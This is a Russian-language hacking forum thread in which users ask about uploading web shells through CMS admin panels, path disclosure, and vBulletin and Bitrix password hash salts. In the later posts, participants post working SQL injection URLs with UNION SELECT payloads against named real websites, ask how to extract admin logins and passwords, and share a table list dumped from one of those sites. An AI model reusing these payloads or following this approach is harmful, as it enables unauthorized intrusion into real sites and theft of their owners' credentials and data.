[Задай Вопрос - Получи Ответ]

Discussion in 'Веб-уязвимости' started by Rombl4, 17 Nov 2008.

  1. gisTy

    gisTy Elder - Старейшина

    Joined:
    24 May 2008
    Messages:
    432
    Likes Received:
    160
    Reputations:
    27
    владелец сайта, который не хочет чтобы поисковой бот индексировал некоторые стрницы
     
  2. diehard

    diehard Elder - Старейшина

    Joined:
    30 Sep 2007
    Messages:
    442
    Likes Received:
    266
    Reputations:
    15
    еще и как пишут))) админки в основном
     
    1 person likes this.
  3. Roston

    Roston Elder - Старейшина

    Joined:
    31 Jul 2008
    Messages:
    337
    Likes Received:
    104
    Reputations:
    8
    Здрасте... подскажите как залить шелл через админку в ДЛЕ. Точой версии сказать не могу.
    Модуль "Архив файлов" отсутствует. Добавил в допустимые файлы для загрузки расширения .php .phtml но когда добавляю новость и загружаю файл и после этого кликаю на файлик то происходит загрузка файла в виде download.php?id=7. Подскажите как выйти из ситуации
     
  4. _gr34t

    _gr34t Member

    Joined:
    26 Oct 2008
    Messages:
    89
    Likes Received:
    13
    Reputations:
    5
    Кто-нибудь знает хотя бы один способ раскрыть пути в Drupal?
     
  5. ErrorNeo

    ErrorNeo Elder - Старейшина

    Joined:
    2 May 2009
    Messages:
    923
    Likes Received:
    838
    Reputations:
    402
    сабж
    касается солей хэшей в Vbulletin

    в Vbulletin нередко имеют место 4-ех символьные соли.
    Насколько я понимаю, слеш в солях воблы экранирует двойную кавычку и одинарную, а так же _иногда_ самого себя.

    примеры 4-символьных солей
    VBulletin:

    Code:
    C\"Y
    FD\\
    =\"a
    \"]O
    \\@n
    \\|t
    Dy\\
    J\\,
    @\\%
    .m\\
    X\"K
    w\"P
    \"hH
    \\mz
    @\"B
    b7\\
    y\\b
    s\"#
    tW\"
    Q!\\
    \">2
    _\"P
    \\tP
    \\gq
    F\'4
    
    примеры 3-символьных солей VBulletin со слэшем:
    Code:
    YD\
    ],\
    W$\
    ]_\
    Dd\
    
    вопрос:
    в каких случаях слэш экранирует сам себя, а в каких нет?
     
  6. $n@ke

    $n@ke Elder - Старейшина

    Joined:
    18 Sep 2006
    Messages:
    696
    Likes Received:
    404
    Reputations:
    134
    Какой тип хеша у Битрикс?
    Вроде md5($pass) , но хеш странный очень:
    пример -
     
  7. [aywo]

    [aywo] Elder - Старейшина

    Joined:
    1 Feb 2007
    Messages:
    89
    Likes Received:
    55
    Reputations:
    5
    в 7-й версии битрикс использует чистый мд5 (32 символа) а в 8-й версии хеш уже 40 символов, то есть неободимо отбросить ненужные символы (salt) то есть в данном случае хеш будет выглядеть так :
    Code:
    fb6e1ad1bf85366d9a91b6e43b87f53b
     
    1 person likes this.
  8. growhel

    growhel New Member

    Joined:
    23 Nov 2009
    Messages:
    2
    Likes Received:
    0
    Reputations:
    0
    http://www.yor_site.ru/index.php?option=com_virtuemart&Itemid=16&lang=ru&next_page=account.shipping&page=account.shipto


    возможно что нибудь сделать?
    это хотяб бы баг?:)
     
  9. S[N]EP

    S[N]EP Elder - Старейшина

    Joined:
    29 Aug 2008
    Messages:
    102
    Likes Received:
    28
    Reputations:
    10
    кто нибудь знает как залить шел в Instantcms, доступ в админку есть.
     
  10. m0Hze

    m0Hze Well-Known Member

    Joined:
    1 Nov 2008
    Messages:
    266
    Likes Received:
    655
    Reputations:
    208
    Очень понятно.С помощтю спиритического анализа,и работе с духами могу сказать одно: для подтверждения ваших догадок,необходимо отпубликовать в теме исходный url.тоесть - оригинальный адрес сайта.
     
  11. growhel

    growhel New Member

    Joined:
    23 Nov 2009
    Messages:
    2
    Likes Received:
    0
    Reputations:
    0
    www.avroragro.ru/index.php?option=com_virtuemart&Itemid=16&lang=ru&next_page=account.shipping&page=account.shipto

    оригинал
     
  12. m0Hze

    m0Hze Well-Known Member

    Joined:
    1 Nov 2008
    Messages:
    266
    Likes Received:
    655
    Reputations:
    208
    Эм
    Code:
    Ошибка: У Вас нет прав для доступа к этому модулю.
    
    Это никак не уязвимость,просто движок тебе сообщает о вещах насущных.
     
  13. FaTRuS

    FaTRuS Elder - Старейшина

    Joined:
    28 Aug 2006
    Messages:
    94
    Likes Received:
    2
    Reputations:
    0
    есть ошибка
    Notice: Undefined offset: 0 in /var/www/virtual/bla-bla-bla/htdocs/blocks/content.php on line 40
    которая появляется если сделать запрос типа
    http://bla-bla-bla/index.php?showmenu=true&id=999999999999999
    что можно с этого поиметь???
     
  14. m0Hze

    m0Hze Well-Known Member

    Joined:
    1 Nov 2008
    Messages:
    266
    Likes Received:
    655
    Reputations:
    208
    Ты уже поимел из нее все что можно,а именно - раскрытие пути.
    Выложи ссылочку на хост,посмотрим что еще там можно "поиметь".
     
  15. m0Hze

    m0Hze Well-Known Member

    Joined:
    1 Nov 2008
    Messages:
    266
    Likes Received:
    655
    Reputations:
    208
    Раз уж на вопрос не ответили,буду археологом,просто не видел раньше.
    Слуш всегда экранирует сам себя,(!)но только тогда,когда слеш который должен экранироваться,не экранирует кавычку.Тоесть например:
    Code:
    [B]\'*([/B] - слеш не будет кранироваться,ибо он экранирует кавычку,и не ювляеться солью.
    (&\\ - слуш экранируеться,так как последний слеш являеться частью соли.
    
    Подругому не бывает :)
    ps, что бы вернуть соли пержний облик,просто прогони ее через stripslashes();
     
    #215 m0Hze, 3 Jan 2010
    Last edited: 3 Jan 2010
  16. FaTRuS

    FaTRuS Elder - Старейшина

    Joined:
    28 Aug 2006
    Messages:
    94
    Likes Received:
    2
    Reputations:
    0
    www.prima-group.kz
     
  17. m0Hze

    m0Hze Well-Known Member

    Joined:
    1 Nov 2008
    Messages:
    266
    Likes Received:
    655
    Reputations:
    208
    http://www.prima-group.kz/index.php?lang=en+from+menu%20where%20id=-1+union+select+TABLE_NAME,TABLE_NAME%20from%20information_schema.tables+--+
    SQL-inj+inc.Раскрутить не смог.
     
  18. FaTRuS

    FaTRuS Elder - Старейшина

    Joined:
    28 Aug 2006
    Messages:
    94
    Likes Received:
    2
    Reputations:
    0
    http://www.gmedia.kz/news1.php?uid=-1+union+select+1,2,3,4,5,6,7,8,9

    Можно ли вытащить логин и пароль от админки
     
  19. m0Hze

    m0Hze Well-Known Member

    Joined:
    1 Nov 2008
    Messages:
    266
    Likes Received:
    655
    Reputations:
    208
    http://www.prima-group.kz/index.php?cid=1525%27+union+select+1,2,3,version%28%29,5,6,7,8,9,user%28%29,11,12,13,14,15+--+
     
  20. m0Hze

    m0Hze Well-Known Member

    Joined:
    1 Nov 2008
    Messages:
    266
    Likes Received:
    655
    Reputations:
    208
    Можеть быть и можно было бы прочитать .htpasswd, Если бы у пользователя были привелегии работы с файлами.
    Скриптом достал спиоск таблиц,может пригодиться.
    Code:
    COLLATIONS
    COLLATION_CHARACTER_SET_APPLICABILITY
    COLUMNS
    COLUMN_PRIVILEGES
    ENGINES
    EVENTS
    FILES
    GLOBAL_STATUS
    GLOBAL_VARIABLES
    KEY_COLUMN_USAGE
    PARTITIONS
    PLUGINS
    PROCESSLIST
    REFERENTIAL_CONSTRAINTS
    ROUTINES
    SCHEMATA
    SCHEMA_PRIVILEGES
    SESSION_STATUS
    SESSION_VARIABLES
    STATISTICS
    TABLES
    TABLE_CONSTRAINTS
    TABLE_PRIVILEGES
    TRIGGERS
    USER_PRIVILEGES
    VIEWS
    CHANNEL
    CHANNEL_NEW
    CHANNEL_POLL
    NEWS
    NEWS1
    POLL
    PRICES
    
     
    4 people like this.